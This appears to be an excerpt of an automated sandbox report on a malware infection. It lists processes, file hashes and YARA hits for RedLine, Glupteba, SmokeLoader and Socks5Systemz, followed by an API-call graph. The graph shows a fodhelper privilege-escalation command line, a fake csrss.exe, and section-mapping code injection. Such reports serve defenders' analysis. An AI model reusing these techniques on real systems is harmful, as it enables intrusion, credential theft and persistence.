                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.2203867401.00000000029CB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000012.00000002.2204215062.0000000003213000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                                                                                                                Start time:05:02:50
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000013.00000002.2197119051.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                                                                                                                Start time:05:02:50
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:1'974'784 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:59646583129ACF5244D686F15AADB25A
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                                                                                                                Start time:05:02:50
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:4'329'368 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:2263495C4A9413605BA6D61AFE170F1F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000015.00000001.2202228549.0000000000843000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000015.00000002.2293956463.0000000000843000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                                                                                                                Start time:05:02:53
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FC24.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\FC24.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:8'459'133 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:EA7FF3104CAA0FF12EEF81A13532235C
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                                                                                                                Start time:05:02:54
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-EM1CB.tmp\FC24.tmp" /SL5="$50482,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:704'000 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:DC768C91E97B42F218028EFA028C41CC
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                                                                                                                Start time:05:02:55
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x390000
                                                                                                                                                                                                                                                                                                                                File size:4'514'184 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                                                                                                                Start time:05:02:55
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\FC24.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:8'459'133 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:EA7FF3104CAA0FF12EEF81A13532235C
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                                                                                                                Start time:05:02:56
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                                                                                                                Start time:05:02:56
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\Sysnative\cmd.exe /C fodhelper
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff71c270000
                                                                                                                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                                                                                                                Start time:05:02:56
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-OHGN5.tmp\FC24.tmp" /SL5="$5008E,8207148,54272,C:\Users\user\AppData\Local\Temp\FC24.exe" /SPAWNWND=$3048A /NOTIFYWND=$50482
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:704'000 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:DC768C91E97B42F218028EFA028C41CC
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                                                                                                                Start time:05:02:56
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                                                                                                                Start time:05:02:56
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:fodhelper
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d03d0000
                                                                                                                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                                                                                                                Start time:05:02:57
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d03d0000
                                                                                                                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                                                                                                                Start time:05:02:58
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff6d03d0000
                                                                                                                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                                                                                                                Start time:05:02:58
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\net.exe" helpmsg 20
                                                                                                                                                                                                                                                                                                                                Imagebase:0x970000
                                                                                                                                                                                                                                                                                                                                File size:47'104 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                                                                                                                Start time:05:02:58
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                                                                                                                Start time:05:02:58
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -i
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:5'393'296 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:ADAF229BB6CEC48AC6D680EBF4856015
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                                                                                                                Start time:05:02:59
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Windows\system32\net1 helpmsg 20
                                                                                                                                                                                                                                                                                                                                Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                                                                File size:139'776 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                                                                                                                                                Start time:05:02:59
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\E36B.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:4'329'368 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:2263495C4A9413605BA6D61AFE170F1F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000028.00000002.2308952189.0000000002952000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000028.00000002.2310762272.0000000003193000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                                                                                                                Start time:05:03:00
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\SplitControlVB\splitcontrolvb.exe" -s
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:5'393'296 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:ADAF229BB6CEC48AC6D680EBF4856015
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000029.00000002.4130064269.00000000029D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000029.00000002.4130620822.0000000002E11000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                                                                                                                                                Start time:05:03:01
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\E36B.exe
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\E36B.exe"
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:4'329'368 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:2263495C4A9413605BA6D61AFE170F1F
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000002.3052219524.0000000000843000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000002A.00000001.2299335069.0000000000843000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                                                                                                                                                Start time:05:03:11
                                                                                                                                                                                                                                                                                                                                Start date:21/12/2023
                                                                                                                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\gwsswwi
                                                                                                                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\gwsswwi
                                                                                                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                File size:249'344 bytes
                                                                                                                                                                                                                                                                                                                                MD5 hash:F98FBCB2A906CCA96365F1D00E6EDEB4
                                                                                                                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002B.00000002.2457824291.00000000025D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000003.2405200857.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.2458238302.0000000002611000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.2457876157.00000000025E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.2457438391.0000000000909000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                                  Execution Coverage:6.3%
                                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:49%
                                                                                                                                                                                                                                                                                                                                  Signature Coverage:40.8%
                                                                                                                                                                                                                                                                                                                                  Total number of Nodes:98
                                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                  execution_graph 4381 402f03 4384 402f11 4381->4384 4382 402f9d 4384->4382 4385 401969 4384->4385 4386 401977 4385->4386 4387 4019ac Sleep 4386->4387 4388 4019c7 4387->4388 4390 4019d8 4388->4390 4391 401590 4388->4391 4390->4382 4392 4015a1 4391->4392 4393 401639 NtDuplicateObject 4392->4393 4402 401755 4392->4402 4394 401656 NtCreateSection 4393->4394 4393->4402 4395 4016d6 NtCreateSection 4394->4395 4396 40167c NtMapViewOfSection 4394->4396 4397 401702 4395->4397 4395->4402 4396->4395 4398 40169f NtMapViewOfSection 4396->4398 4400 40170c NtMapViewOfSection 4397->4400 4397->4402 4398->4395 4399 4016bd 4398->4399 4399->4395 4401 401733 NtMapViewOfSection 4400->4401 4400->4402 4401->4402 4402->4390 4566 402e83 4568 402dde 4566->4568 4567 402e93 4568->4566 4568->4567 4569 401969 8 API calls 4568->4569 4569->4567 4528 2480001 4529 2480005 4528->4529 4534 248092b GetPEB 4529->4534 4531 2480030 4536 248003c 4531->4536 4535 2480972 4534->4535 4535->4531 4537 2480049 4536->4537 4538 2480e0f 2 API calls 4537->4538 4539 2480223 4538->4539 4540 2480d90 GetPEB 4539->4540 4541 2480238 VirtualAlloc 4540->4541 4542 2480265 4541->4542 4543 24802ce VirtualProtect 4542->4543 4545 248030b 4543->4545 4544 2480439 VirtualFree 4548 24804be LoadLibraryA 4544->4548 4545->4544 4547 24808c7 4548->4547 4549 2480005 4550 248092b GetPEB 4549->4550 4551 2480030 4550->4551 4552 248003c 7 API calls 4551->4552 4553 2480038 4552->4553 4366 96fc46 4367 96fc55 4366->4367 4370 9703e6 4367->4370 4371 970401 4370->4371 4372 97040a CreateToolhelp32Snapshot 4371->4372 4373 970426 Module32First 4371->4373 4372->4371 4372->4373 4374 970435 4373->4374 4376 96fc5e 4373->4376 4377 9700a5 4374->4377 4378 9700d0 4377->4378 4379 9700e1 VirtualAlloc 4378->4379 4380 970119 4378->4380 4379->4380 4482 40159b 4483 4015ae 4482->4483 4484 401639 NtDuplicateObject 4483->4484 4493 401755 4483->4493 4485 401656 NtCreateSection 4484->4485 4484->4493 4486 4016d6 NtCreateSection 4485->4486 4487 40167c NtMapViewOfSection 4485->4487 4488 401702 4486->4488 4486->4493 4487->4486 4489 40169f NtMapViewOfSection 4487->4489 4491 40170c NtMapViewOfSection 4488->4491 4488->4493 4489->4486 4490 4016bd 4489->4490 4490->4486 4492 401733 NtMapViewOfSection 4491->4492 4491->4493 4492->4493 4554 402ee4 4555 402edc 4554->4555 4556 401969 8 API calls 4555->4556 4557 402f9d 4555->4557 4556->4557 4403 248003c 4404 2480049 4403->4404 4416 2480e0f SetErrorMode SetErrorMode 4404->4416 4409 2480265 4410 24802ce VirtualProtect 4409->4410 4412 248030b 4410->4412 4411 2480439 VirtualFree 4415 24804be LoadLibraryA 4411->4415 4412->4411 4414 24808c7 4415->4414 4417 2480223 4416->4417 4418 2480d90 4417->4418 4419 2480dad 4418->4419 4420 2480dbb GetPEB 4419->4420 4421 2480238 VirtualAlloc 4419->4421 4420->4421 4421->4409 4426 401975 4427 401977 4426->4427 4428 4019ac Sleep 4427->4428 4429 4019c7 4428->4429 4430 4019d8 4429->4430 4431 401590 7 API calls 4429->4431 4431->4430 4512 4029ba 4513 4029ca 4512->4513 4514 402a0f LdrLoadDll 4513->4514 4515 402a1f 4514->4515

                                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                                  • Not Executed
